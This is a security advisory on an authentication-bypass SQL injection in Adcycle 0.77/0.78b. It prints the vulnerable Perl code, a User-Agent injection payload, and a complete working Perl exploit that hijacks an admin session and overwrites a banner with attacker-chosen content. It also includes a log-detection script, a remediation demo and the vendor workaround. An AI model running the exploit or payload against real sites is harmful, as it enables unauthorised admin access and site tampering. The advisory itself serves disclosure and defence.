Adcycle AdLibrary.pm Unauthorized Session Access Vulnerability
Release date: 2001-02-26
Update date: 2001-02-26
Affected systems:
Adcycle.com Adcycle 0.78b
Adcycle.com Adcycle 0.77
- Linux
- Sun Solaris
- OpenBSD
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
- HP-UX
Description:
BUGTRAQ ID: 2393
CVE(CAN) ID: CAN-2001-0425
Adcycle is a set of Perl scripts developed by Adcycle.com, used mainly to manage banners, with a MySQL database as the backend.
It contains a security flaw that may let a malicious user bypass the authentication step and operate on the database.
The problem lies in the following code:
AdLibrary.pm:
sub db_login() {
==>
if($verify==0){
$FOUND=0;
$sth = $dbh->prepare("SELECT * FROM login WHERE remote='$remote' && agent='$agent' ORDER BY stime DESC");
$sth->execute;
while(@login = $sth->fetchrow_array){
if(length($login[1])>1){
$verify=1;
$whoami=$login[1];
$pid=$mixer;
}
}
$sth->finish();
}
<==
}
If a user sets the agent (User-Agent header) to:
$agent = Mozilla' || aid='ADMIN
then all records of the ADMIN user may be obtained (provided the ADMIN user is logged in at that time).
Using other CGI programs, an attacker may also be able to delete database records.
<* Source: Neil K (neilk@alldas.de) *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!
Neil K (neilk@alldas.de) provided the following demonstration code:
#!/usr/bin/perl
#
#Adcycle v0.78b eXploit
#by neilk@alldas.de
#
#This script exploits a situation that allows a remote user to 'skip'
#authentication if the legitimate Admin is logged in or has not logged
#out properly since their last session.
#
#Shoutz to: tribunal, domz, all @alldas.de, mjm @gmc-online.de
# code segments borrowed from teleh0r @doglover.com
#
#http://news.alldas.de.
#
use strict;
use Socket;
banner();
if (@ARGV < 1) {
usage();
exit(1);
}
(my $target) = @ARGV;
my $clickurl="http://www.fuqu.com";
my $dir="cgi-bin/adcycle";
my $imageurl="http://www.hornylesbians.com/pr0n.gif";
my $cid="MT01";
my $bannerid=1;
my $agent = "Mozilla'||aid='ADMIN";
my $url = "click=$clickurl&image=$imageurl&pri=0&change=Update+Banner+1+Profile&option=AUTO&border=1&align=CENTER&target=_blank&alt=h0h0h0h0&btext=%3Cfont+face%3D%22verdana%22+size%3D2%3E%3Cstrong%3EClick+Here+to+Visit+our+Sponsor%3C%2Fstrong%3E%3C%2Ffont%3E&html=%3C%21--+START+ADCYCLE.COM+RICH+MEDIA+HTML+CODE+--%3E%0D%0A%3Ccenter%3E%0D%0A%3Ca+href%3D%22http%3A%2F%2F$target%2F$dir%2Fadclick.cgi%3Fmanager%3Dadcycle.com%26cid%3D$cid%26b%3D1%26id%3DIDNUMBER%22+target%3D%22_top%22%3E%0D%0A%3Cimg+src%3D%22$imageurl%22+width%3D468+height%3D60+border%3D1+ALT%3D%22Script+Kiddiot+Attack!%22%3E%3C%2Fa%3E%3Cbr%3E%0D%0A%3Ca+href%3D%22http%3A%2F%2F$target%2F$dir%2Fadclick.cgi%3Fmanager%3Dadcycle.com%26cid%3D$cid%26b%3D1%26id%3DIDNUMBER%22+target%3D%22_top%22%3E%3Cfont+face%3D%22verdana%22+size%3D2%3E%3Cstrong%3Eantionlinesuxhard%3C%2Fstrong%3E%3C%2Ffont%3E%3C%2Fa%3E%0D%0A%3C%2Fcenter%3E%0D%0A+%3C%21--+END+ADCYCLE.COM+RICH+MEDIA+HTML+CODE+--%3E%0D%0A%0D%0A&null=%3Ca+href%3D%22http%3A%2F%2F$target%2F$dir%2Fadclick.cgi%3Fmanager%3Dadcycle.com%26cid%3D$cid%26b%3D1%26id%3DIDNUMBER%22%3E&task=update_banner_profile&cid=$cid&banner=$bannerid&pg=2";
my $url_length = length($url);
my $request=
"POST /$dir/adcenter.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $url_length
$url
";
my $iaddr = inet_aton($target);
my $paddr = sockaddr_in(80, $iaddr);
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, 'tcp');
connect(SOCKET, $paddr);
send(SOCKET,"$request", 0);
close(SOCKET);
exit(1);
sub banner {
print "\nAdcycle eXploit for V0.77b/0.78b\n";
print "by Neilk (neilk\@alldas.de/neil\@alldas.de)\n";
print "http://www.alldas.de\n\n";
}
sub usage {
print "Usage:\tperl $0 <target ip>\n\n";
}
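The request above puts the injection in the User-Agent header of a POST to adcenter.cgi, which is something a web-server log records verbatim. The following detection logic is an added example and is not part of the advisory or of Adcycle: it parses Apache/NCSA "combined" log lines (an assumed layout), picks out requests to the Adcycle CGI directory named in the exploit, and grades the User-Agent by whether it merely contains a single quote or also shows the quote-then-OR-then-column shape of the payload. The log lines, addresses and timestamps are constructed for the demonstration.

```python
"""Added example (not from the advisory): flag web-server log entries whose
User-Agent carries the quote-injection pattern the Adcycle advisory describes."""
import re

# Apache/NCSA "combined" log format. The regex is written for this example
# and assumes that layout (client IP, identd, user, timestamp, request line,
# status, bytes, referer, user agent).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Any script under the Adcycle CGI directory (path taken from the advisory's exploit).
ADCYCLE_PATH_RE = re.compile(r"/adcycle/[^/?]+\.cgi", re.I)

# A quote that closes the SQL string literal, followed by an OR (MySQL '||' or the
# keyword) and another column comparison, as in   Mozilla'||aid='ADMIN
INJECTION_RE = re.compile(r"'\s*(\|\||or)\s*\w+\s*=", re.I)

# Constructed sample log lines (fictional addresses and timestamps), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Feb/2001:09:00:01 +0000] "GET /cgi-bin/adcycle/adcenter.cgi HTTP/1.0" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 5.0)"
198.51.100.7 - - [26/Feb/2001:09:02:15 +0000] "POST /cgi-bin/adcycle/adcenter.cgi HTTP/1.0" 200 512 "-" "Mozilla'||aid='ADMIN"
203.0.113.5 - - [26/Feb/2001:09:03:40 +0000] "GET /index.html HTTP/1.0" 200 1024 "-" "O'Reilly Bot/1.0"
198.51.100.7 - - [26/Feb/2001:09:04:02 +0000] "GET /cgi-bin/adcycle/adclick.cgi?cid=MT01 HTTP/1.0" 302 0 "-" "Mozilla' OR aid='ADMIN"
203.0.113.5 - - [26/Feb/2001:09:05:11 +0000] "GET /cgi-bin/adcycle/adcenter.cgi HTTP/1.0" 200 2048 "-" "O'Reilly Bot/1.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a severity label for one parsed entry, or None if nothing looks suspicious."""
    if not ADCYCLE_PATH_RE.search(entry["path"]):
        return None                    # not an Adcycle script: out of scope for this rule
    if INJECTION_RE.search(entry["agent"]):
        return "high"                  # quote + OR + column comparison: the advisory's payload shape
    if "'" in entry["agent"]:
        return "low"                   # a bare quote in a User-Agent aimed at Adcycle: worth a look
    return None


def scan(log_text):
    """Return (ip, path, agent, severity) for every suspicious line in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue                   # unparseable line: skip rather than crash the scan
        severity = classify(entry)
        if severity:
            hits.append((entry["ip"], entry["path"], entry["agent"], severity))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run against the embedded sample, the two payload-shaped agents come back as "high" and the apostrophe in a legitimate bot name hitting the same script comes back as "low"; the same bot name on a non-Adcycle URL is ignored. The two-tier grading keeps the rule useful on real logs, where apostrophes in User-Agent strings are uncommon but not unheard of.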
Recommendation:
Temporary workaround:
NSFOCUS recommends modifying the script according to the temporary workaround supplied by the vulnerability discoverer:
AdLibrary.pm:
sub db_login {
=>
my $agent=$env->get_agent;
+ while($agent =~ s/'// !=0 ){}
my $cookie=$env->get_cookie;
my $datestamp=$env->get_datestamp;
my $admin_user_name=$config->get_admin_user_name;
=>
if($verify==0){
my($trash,$mycookname,$mycookpid)=split(/\!\!/,$cookie);
+ while($mycookpid =~ s/'// !=0 ){}
=>
$FOUND=0;
$sth = $dbh->prepare("SELECT * FROM login WHERE pid='$mycookpid' && agent='$agent' ORDER BY stime DESC");
$sth->execute;
while(@login = $sth->fetchrow_array){
if(length($login[1])>1){
$verify=1;
$whoami=$login[1];
$pid=$mycookpid;
}
}
$sth->finish();
}
<=
}
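As an added example (not AdLibrary.pm and not the discoverer's patch), the session lookup above is rebuilt on SQLite in Python so that three variants can be compared on the advisory's own User-Agent value: the original string-built query keyed on the remote address, the quote-stripping workaround keyed on the cookie pid, and a placeholder query. The table columns, row values, client addresses and the "guessed-pid" cookie are constructed for the demonstration. MySQL's parser reads `||` as OR, which is what the advisory's payload relies on; SQLite reads `||` as string concatenation and has no `&&`, so the payload is spelled with `OR` and the conjunction with `AND`, which is the same SQL MySQL would see.

```python
"""Added example (not AdLibrary.pm): the advisory's db_login lookup rebuilt on
SQLite to contrast string-built SQL, the quote-stripping workaround, and placeholders."""
import re
import sqlite3

# Constructed sample 'login' table modelled on the columns the advisory's query
# touches (remote, agent, pid, aid, stime). All values are made up.
ROWS = [
    ("192.0.2.10", "Mozilla/4.0", "pid-admin-1", "ADMIN", "2001-02-25 10:00:00"),
    ("192.0.2.20", "Mozilla/4.0", "pid-user-1", "bob", "2001-02-25 10:05:00"),
]

# The advisory's User-Agent value, with MySQL's '||' written as OR for SQLite.
PAYLOAD_AGENT = "Mozilla' OR aid='ADMIN"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (remote TEXT, agent TEXT, pid TEXT, aid TEXT, stime TEXT)")
    db.executemany("INSERT INTO login VALUES (?,?,?,?,?)", ROWS)
    return db


def vulnerable_lookup(db, remote, agent):
    # The pattern from the original db_login: header values interpolated straight into SQL.
    sql = (f"SELECT aid, pid FROM login WHERE remote='{remote}' AND agent='{agent}' "
           "ORDER BY stime DESC")
    return db.execute(sql).fetchall()


def strip_quotes(value):
    # Python port of the workaround's  while($agent =~ s/'// !=0 ){}  loop:
    # remove every single quote from the value.
    return re.sub(r"'", "", value)


def workaround_lookup(db, cookie_pid, agent):
    # The temporary fix: key on the pid carried in the cookie instead of the remote
    # address, and strip single quotes from both values before interpolating them.
    cookie_pid = strip_quotes(cookie_pid)
    agent = strip_quotes(agent)
    sql = (f"SELECT aid, pid FROM login WHERE pid='{cookie_pid}' AND agent='{agent}' "
           "ORDER BY stime DESC")
    return db.execute(sql).fetchall()


def hardened_lookup(db, cookie_pid, agent):
    # Placeholders: the driver passes the values separately from the statement,
    # so quotes in the User-Agent or cookie can never change the query's structure.
    sql = "SELECT aid, pid FROM login WHERE pid=? AND agent=? ORDER BY stime DESC"
    return db.execute(sql, (cookie_pid, agent)).fetchall()


def demo():
    """Run the same payload through all three variants and return what each finds."""
    db = make_db()
    attacker_ip = "198.51.100.7"       # not in the table, so a correct lookup finds nothing
    return {
        # 'AND' binds tighter than 'OR', so the injected clause matches the ADMIN row
        "vulnerable": vulnerable_lookup(db, attacker_ip, PAYLOAD_AGENT),
        # quotes removed: the payload is just an odd, non-matching User-Agent string
        "workaround": workaround_lookup(db, "guessed-pid", PAYLOAD_AGENT),
        "hardened": hardened_lookup(db, "guessed-pid", PAYLOAD_AGENT),
        # the legitimate session still resolves with placeholders
        "legit": hardened_lookup(db, "pid-admin-1", "Mozilla/4.0"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:11s} -> {rows}")
```

The quote-stripping loop does close the hole the advisory describes, but only for the single-quote character; the placeholder form removes the whole class of problem, because the User-Agent and cookie values are never parsed as SQL at all, and it is what DBI's `prepare` with `?` parameters and `execute(@values)` gives the Perl code directly.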
Vendor patch:
None available at this time